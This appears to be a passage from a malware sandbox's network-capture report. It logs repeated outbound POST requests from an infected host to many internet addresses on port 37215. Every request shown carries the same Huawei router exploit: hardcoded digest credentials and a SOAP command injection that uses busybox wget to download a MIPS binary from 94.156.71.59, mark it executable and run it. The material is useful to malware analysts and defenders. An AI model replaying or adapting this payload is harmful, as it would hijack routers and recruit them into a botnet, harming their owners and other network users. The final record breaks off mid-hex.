                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            695192.168.2.133893041.120.207.13937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.656080961 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            696192.168.2.1334154156.66.27.14137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.656591892 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            697192.168.2.135071441.14.88.1037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.657284021 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            698192.168.2.1338440197.63.49.20237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.657974005 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            699192.168.2.1358346156.2.142.24137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.658653021 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            700192.168.2.136088241.178.84.3937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.660067081 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            701192.168.2.1349490197.173.181.19937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.662261009 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            702192.168.2.1354254156.225.226.1337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.663240910 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            703192.168.2.1342468197.210.141.6237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.664556026 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            704192.168.2.1334524197.151.209.19337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.666291952 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 